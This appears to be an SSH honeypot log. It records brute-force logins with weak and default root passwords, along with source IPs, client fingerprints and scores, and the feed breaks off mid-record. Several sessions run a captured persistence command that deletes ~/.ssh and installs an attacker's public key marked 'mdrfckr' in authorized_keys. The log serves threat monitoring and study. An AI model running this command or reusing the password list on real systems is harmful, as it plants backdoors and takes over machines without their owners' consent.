[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: d20071eca433
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 5.9s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "d20071eca433",
  "src_ip": "179.102.26.14",
  "start_time": "2026-05-16T23:02:14.965047Z",
  "end_time": "2026-05-16T23:02:20.830238Z",
  "duration": "5.9",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "Aa12345678."
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
183.182.125.142
2026-05-16 23:01:41.493270 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: f25ab6946b5f
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 1.4s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "f25ab6946b5f",
  "src_ip": "183.182.125.142",
  "start_time": "2026-05-16T23:01:41.493270Z",
  "end_time": "2026-05-16T23:01:42.898196Z",
  "duration": "1.4",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
183.182.125.142
2026-05-16 23:01:38.902932 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: 1aae3900e38f
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2.4s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "1aae3900e38f",
  "src_ip": "183.182.125.142",
  "start_time": "2026-05-16T23:01:38.902932Z",
  "end_time": "2026-05-16T23:01:41.262681Z",
  "duration": "2.4",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
183.182.125.142
2026-05-16 23:01:35.929516 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / Mo123456

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 24800d19f0c6
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 7.0s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "24800d19f0c6",
  "src_ip": "183.182.125.142",
  "start_time": "2026-05-16T23:01:35.929516Z",
  "end_time": "2026-05-16T23:01:42.889988Z",
  "duration": "7.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "Mo123456"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
106.246.89.72
2026-05-16 22:59:49.839131 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: pi

Record ID: f5c0721a8c0d
Client Version: SSH-2.0-OpenSSH_7.4
Engagement Duration: 9.0s
HASSH Fingerprint: acaa53e0a7d7ac7d1255103f37901306
{
  "id": "f5c0721a8c0d",
  "src_ip": "106.246.89.72",
  "start_time": "2026-05-16T22:59:49.839131Z",
  "end_time": "2026-05-16T22:59:58.856282Z",
  "duration": "9.0",
  "version": "SSH-2.0-OpenSSH_7.4",
  "hassh": "acaa53e0a7d7ac7d1255103f37901306",
  "attempts": [
    {
      "user": "pi",
      "pass": "raspberrypi"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
38.95.75.98
2026-05-16 22:59:28.307185 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: ea2a49bea964
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 1.2s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "ea2a49bea964",
  "src_ip": "38.95.75.98",
  "start_time": "2026-05-16T22:59:28.307185Z",
  "end_time": "2026-05-16T22:59:29.557557Z",
  "duration": "1.2",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
38.95.75.98
2026-05-16 22:59:25.914841 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: ec4b8c728076
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2.2s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "ec4b8c728076",
  "src_ip": "38.95.75.98",
  "start_time": "2026-05-16T22:59:25.914841Z",
  "end_time": "2026-05-16T22:59:28.104261Z",
  "duration": "2.2",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
38.95.75.98
2026-05-16 22:59:23.379409 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / 20192019

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 4c8cb244c947
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 6.2s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "4c8cb244c947",
  "src_ip": "38.95.75.98",
  "start_time": "2026-05-16T22:59:23.379409Z",
  "end_time": "2026-05-16T22:59:29.553677Z",
  "duration": "6.2",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "20192019"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
218.94.115.164
2026-05-16 22:57:17.441664 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / root2001

Record ID: 491b7a3a3b15
Client Version: SSH-2.0-OpenSSH_7.4
Engagement Duration: 7.8s
HASSH Fingerprint: acaa53e0a7d7ac7d1255103f37901306
{
  "id": "491b7a3a3b15",
  "src_ip": "218.94.115.164",
  "start_time": "2026-05-16T22:57:17.441664Z",
  "end_time": "2026-05-16T22:57:25.289335Z",
  "duration": "7.8",
  "version": "SSH-2.0-OpenSSH_7.4",
  "hassh": "acaa53e0a7d7ac7d1255103f37901306",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "root2001"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
186.235.193.170
2026-05-16 22:57:08.095690 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / root2001

Record ID: 1ea4df4d424f
Client Version: SSH-2.0-OpenSSH_7.4
Engagement Duration: 8.8s
HASSH Fingerprint: acaa53e0a7d7ac7d1255103f37901306
{
  "id": "1ea4df4d424f",
  "src_ip": "186.235.193.170",
  "start_time": "2026-05-16T22:57:08.095690Z",
  "end_time": "2026-05-16T22:57:16.896389Z",
  "duration": "8.8",
  "version": "SSH-2.0-OpenSSH_7.4",
  "hassh": "acaa53e0a7d7ac7d1255103f37901306",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "root2001"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
87.251.64.176
2026-05-16 22:50:01.059155 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: support

Record ID: 0a205e0de936
Client Version: SSH-2.0-Go
Engagement Duration: 1.9s
HASSH Fingerprint: eff4c24daffc8532c160e86e5f006e53
{
  "id": "0a205e0de936",
  "src_ip": "87.251.64.176",
  "start_time": "2026-05-16T22:50:01.059155Z",
  "end_time": "2026-05-16T22:50:02.911984Z",
  "duration": "1.9",
  "version": "SSH-2.0-Go",
  "hassh": "eff4c24daffc8532c160e86e5f006e53",
  "attempts": [
    {
      "user": "support",
      "pass": "support"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
65.20.198.159
2026-05-16 22:45:40.876348 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / !QAZxsw2

Record ID: a61383eaaa55
Client Version: SSH-2.0-OpenSSH_7.4
Engagement Duration: 8.3s
HASSH Fingerprint: acaa53e0a7d7ac7d1255103f37901306
{
  "id": "a61383eaaa55",
  "src_ip": "65.20.198.159",
  "start_time": "2026-05-16T22:45:40.876348Z",
  "end_time": "2026-05-16T22:45:49.131430Z",
  "duration": "8.3",
  "version": "SSH-2.0-OpenSSH_7.4",
  "hassh": "acaa53e0a7d7ac7d1255103f37901306",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "!QAZxsw2"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
65.20.138.3
2026-05-16 22:45:31.781390 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / !QAZxsw2

Record ID: 249a33121761
Client Version: SSH-2.0-OpenSSH_7.4
Engagement Duration: 8.1s
HASSH Fingerprint: acaa53e0a7d7ac7d1255103f37901306
{
  "id": "249a33121761",
  "src_ip": "65.20.138.3",
  "start_time": "2026-05-16T22:45:31.781390Z",
  "end_time": "2026-05-16T22:45:39.876939Z",
  "duration": "8.1",
  "version": "SSH-2.0-OpenSSH_7.4",
  "hassh": "acaa53e0a7d7ac7d1255103f37901306",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "!QAZxsw2"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
103.203.57.2
2026-05-16 22:39:32.055655 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 90880304d95d
Client Version: SSH-2.0-Go
Engagement Duration: 10.0s
HASSH Fingerprint: 084386fa7ae5039bcf6f07298a05a227
{
  "id": "90880304d95d",
  "src_ip": "103.203.57.2",
  "start_time": "2026-05-16T22:39:32.055655Z",
  "end_time": "2026-05-16T22:39:42.055336Z",
  "duration": "10.0",
  "version": "SSH-2.0-Go",
  "hassh": "084386fa7ae5039bcf6f07298a05a227",
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
122.160.50.155
2026-05-16 22:30:35.803953 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: support

Record ID: 1d8f7a140837
Client Version: SSH-2.0-OpenSSH_7.4
Engagement Duration: 4.8s
HASSH Fingerprint: acaa53e0a7d7ac7d1255103f37901306
{
  "id": "1d8f7a140837",
  "src_ip": "122.160.50.155",
  "start_time": "2026-05-16T22:30:35.803953Z",
  "end_time": "2026-05-16T22:30:40.647213Z",
  "duration": "4.8",
  "version": "SSH-2.0-OpenSSH_7.4",
  "hassh": "acaa53e0a7d7ac7d1255103f37901306",
  "attempts": [
    {
      "user": "support",
      "pass": "1qaz2wsx"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
192.168.0.1
2026-05-16 22:29:15.966549 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: da77d7cf9f33
Client Version: Unknown
Engagement Duration: 0.0s
{
  "id": "da77d7cf9f33",
  "src_ip": "192.168.0.1",
  "start_time": "2026-05-16T22:29:15.966549Z",
  "end_time": "2026-05-16T22:29:15.977362Z",
  "duration": "0.0",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
221.120.4.61
2026-05-16 22:27:32.699946 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: john

Record ID: 271799dfb074
Client Version: SSH-2.0-OpenSSH_7.4
Engagement Duration: 4.6s
HASSH Fingerprint: acaa53e0a7d7ac7d1255103f37901306
{
  "id": "271799dfb074",
  "src_ip": "221.120.4.61",
  "start_time": "2026-05-16T22:27:32.699946Z",
  "end_time": "2026-05-16T22:27:37.294283Z",
  "duration": "4.6",
  "version": "SSH-2.0-OpenSSH_7.4",
  "hassh": "acaa53e0a7d7ac7d1255103f37901306",
  "attempts": [
    {
      "user": "john",
      "pass": "john"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
91.144.158.62
2026-05-16 22:17:32.619055 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 11e895612a38
Client Version: SSH-2.0-OpenSSH_7.4
Engagement Duration: 2.7s
HASSH Fingerprint: acaa53e0a7d7ac7d1255103f37901306
{
  "id": "11e895612a38",
  "src_ip": "91.144.158.62",
  "start_time": "2026-05-16T22:17:32.619055Z",
  "end_time": "2026-05-16T22:17:35.328292Z",
  "duration": "2.7",
  "version": "SSH-2.0-OpenSSH_7.4",
  "hassh": "acaa53e0a7d7ac7d1255103f37901306",
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
87.251.64.176
2026-05-16 22:16:59.055007 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: support

Record ID: f332d403957c
Client Version: SSH-2.0-Go
Engagement Duration: 1.9s
HASSH Fingerprint: eff4c24daffc8532c160e86e5f006e53
{
  "id": "f332d403957c",
  "src_ip": "87.251.64.176",
  "start_time": "2026-05-16T22:16:59.055007Z",
  "end_time": "2026-05-16T22:17:00.913553Z",
  "duration": "1.9",
  "version": "SSH-2.0-Go",
  "hassh": "eff4c24daffc8532c160e86e5f006e53",
  "attempts": [
    {
      "user": "support",
      "pass": "support"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
205.210.31.229
2026-05-16 22:06:22.286947 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: c97b4d325c5f
Client Version: SSH-2.0-ZGrab ZGrab SSH Survey
Engagement Duration: 3.1s
HASSH Fingerprint: dd9bcf093c355da7000132131cb36fd0
{
  "id": "c97b4d325c5f",
  "src_ip": "205.210.31.229",
  "start_time": "2026-05-16T22:06:22.286947Z",
  "end_time": "2026-05-16T22:06:25.401186Z",
  "duration": "3.1",
  "version": "SSH-2.0-ZGrab ZGrab SSH Survey",
  "hassh": "dd9bcf093c355da7000132131cb36fd0",
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
87.251.64.176
2026-05-16 22:01:29.540892 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: support

Record ID: 5db88f3e13f3
Client Version: SSH-2.0-Go
Engagement Duration: 1.9s
HASSH Fingerprint: eff4c24daffc8532c160e86e5f006e53
{
  "id": "5db88f3e13f3",
  "src_ip": "87.251.64.176",
  "start_time": "2026-05-16T22:01:29.540892Z",
  "end_time": "2026-05-16T22:01:31.400395Z",
  "duration": "1.9",
  "version": "SSH-2.0-Go",
  "hassh": "eff4c24daffc8532c160e86e5f006e53",
  "attempts": [
    {
      "user": "support",
      "pass": "support"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
223.197.153.135
2026-05-16 22:01:29.461494 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: user

Record ID: 2736432659da
Client Version: SSH-2.0-OpenSSH_7.4
Engagement Duration: 5.5s
HASSH Fingerprint: acaa53e0a7d7ac7d1255103f37901306
{
  "id": "2736432659da",
  "src_ip": "223.197.153.135",
  "start_time": "2026-05-16T22:01:29.461494Z",
  "end_time": "2026-05-16T22:01:34.925879Z",
  "duration": "5.5",
  "version": "SSH-2.0-OpenSSH_7.4",
  "hassh": "acaa53e0a7d7ac7d1255103f37901306",
  "attempts": [
    {
      "user": "user",
      "pass": "pass"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
49.124.150.251
2026-05-16 22:01:28.653413 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 30a2f9b9f098
Client Version: Unknown
Engagement Duration: 0.3s
{
  "id": "30a2f9b9f098",
  "src_ip": "49.124.150.251",
  "start_time": "2026-05-16T22:01:28.653413Z",
  "end_time": "2026-05-16T22:01:28.949441Z",
  "duration": "0.3",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
39.185.89.241
2026-05-16 21:58:01.174226 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: admin

Record ID: 232f2402fbbb
Client Version: SSH-2.0-OpenSSH_7.4
Engagement Duration: 5.1s
HASSH Fingerprint: acaa53e0a7d7ac7d1255103f37901306
{
  "id": "232f2402fbbb",
  "src_ip": "39.185.89.241",
  "start_time": "2026-05-16T21:58:01.174226Z",
  "end_time": "2026-05-16T21:58:06.281368Z",
  "duration": "5.1",
  "version": "SSH-2.0-OpenSSH_7.4",
  "hassh": "acaa53e0a7d7ac7d1255103f37901306",
  "attempts": [
    {
      "user": "admin",
      "pass": "asdf1234"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
130.12.180.51
2026-05-16 21:57:13.455903 UTC
COMMANDS RUN SUCCESSFUL LOGIN RECONNAISSANCE DATA THEFT SCORE: 150

Credential acceptance event recorded. Target authentication: root / P

Remote entity achieved interactive shell state. Command sequence (1 executed):

